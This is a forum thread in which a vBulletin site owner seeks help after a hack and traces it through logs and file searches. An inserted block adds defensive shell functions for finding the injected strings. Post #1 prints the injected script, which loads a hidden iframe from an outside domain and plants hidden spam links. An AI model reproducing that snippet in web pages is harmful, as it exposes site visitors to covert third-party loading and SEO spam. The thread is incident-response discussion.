Site hacked --!!!!-- Using vB 4.13 PL2

  • [Forum] Site hacked --!!!!-- Using vB 4.13 PL2

    Someone has been able to hack my site - the only evidence I can find right now is in the source code of every page:

    Code:
    <script>function xl1(url){var h;var t=new Date().getTime();if(window.XMLHttpRequest){h=new XMLHttpRequest();}else{h=new ActiveXObject("Microsoft.XMLHTTP");}h.open("GET",url+"?t="+t,true);h.send();}var f = document.createElement("iframe");f.setAttribute('id', 'ifrm');f.style.display='none';document.body.appendChild(f);f.setAttribute('src','http://www.20vn.com/index.htm?ref='+document.domain);</script><p style="display:none"><a href="http://www.20vn.com" rel="bookmark" title="Articles 20VN">Articles 20VN - The best of articles collection</a> <a href="http://www.20vn.com/static/google+.html" rel="bookmark" title="Get Google+ Invite Automatic">Articles 20VN - Get Google+ Invite Automatic</a><p> <div id="pagetitle"> <h1>SEO Forum.

    As you can see it's above the pagetitle div, and therefore just below the navbar. Naturally none of the above code exists on any template.

    I'm just in the throes of upgrading to 4.14 PL - but I'm pretty sure in saying that it's not going to fix the hack.

    Any suggestions/pointers on finding and removing this? thanks
    Martin

  • #2
    Look in:
    Plugins
    .js files
    Added .php files with a call to the file in the templates.

    First, look at your control panel log and see if there are any actions that look fishy.

    Next, look at the files on your server with modified dates that don't jive.


    • #3
      By "look in" I assume the quickest way is to download a complete copy of the codebase and search that, right? Thanks for your help btw. M

      Comment


      • #4
        Depends on skill level.

        FTP client should show last modified date.
        With SSH you could grep -r 'function xl1(url)' *
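The file checks suggested in #2 and #4, as an added example that is not part of any post in this thread: shell functions that search a web root for the two strings from the injected snippet in post #1 and cross-check the hits against recently modified files. The function names, the web root path and the day window are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): triage a web root for the injected snippet.
# Indicator strings come from the code quoted in post #1; everything else is assumed.

# One fixed string per line, matched literally (not as a regex).
INDICATORS='function xl1(url)
20vn.com'

# find_injected ROOT: print "path<TAB>indicator" for each file containing an indicator.
find_injected() {
    root=$1
    printf '%s\n' "$INDICATORS" | while IFS= read -r ioc; do
        # -r recurse, -l file names only, -I skip binaries, -F fixed string
        grep -rlIF -- "$ioc" "$root" 2>/dev/null | while IFS= read -r f; do
            printf '%s\t%s\n' "$f" "$ioc"
        done
    done | sort -u
}

# recently_modified ROOT DAYS: script and page files changed in the last DAYS days,
# i.e. the "modified dates" check from post #2.
recently_modified() {
    find "$1" -type f \( -name '*.php' -o -name '*.js' -o -name '*.htm*' \) \
        -mtime "-$2" -print | sort
}

# suspicious ROOT DAYS: files that both contain an indicator and were recently
# modified; these are the first ones to inspect by hand.
suspicious() {
    tmp_a=$(mktemp) tmp_b=$(mktemp)
    find_injected "$1" | cut -f1 | sort -u > "$tmp_a"
    recently_modified "$1" "$2" > "$tmp_b"
    comm -12 "$tmp_a" "$tmp_b"
    rm -f "$tmp_a" "$tmp_b"
}

# Usage (hypothetical path): suspicious /var/www/forum 7
```

vBulletin keeps plugins and templates in the database rather than on disk, so a clean file scan does not rule out an injection stored there.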


        • #5
          Got it - also, this is interesting: from my control panel access log, it's me at home, me at work.... and this IP: http://whois.domaintools.com/1.52.130.116 in Vietnam. Where I certainly neither live nor work. THANK YOU for the pointer..



          • #6
            He appears to have created, then deleted a plugin with the id 1441. Still scanning files.



            • #7
              GOT IT.... The MODCP has been compromised somehow. Removing the hack now. Thanks again.



              • #8
                OK - can't seem to get rid of it. I've posted a ticket in the support system....
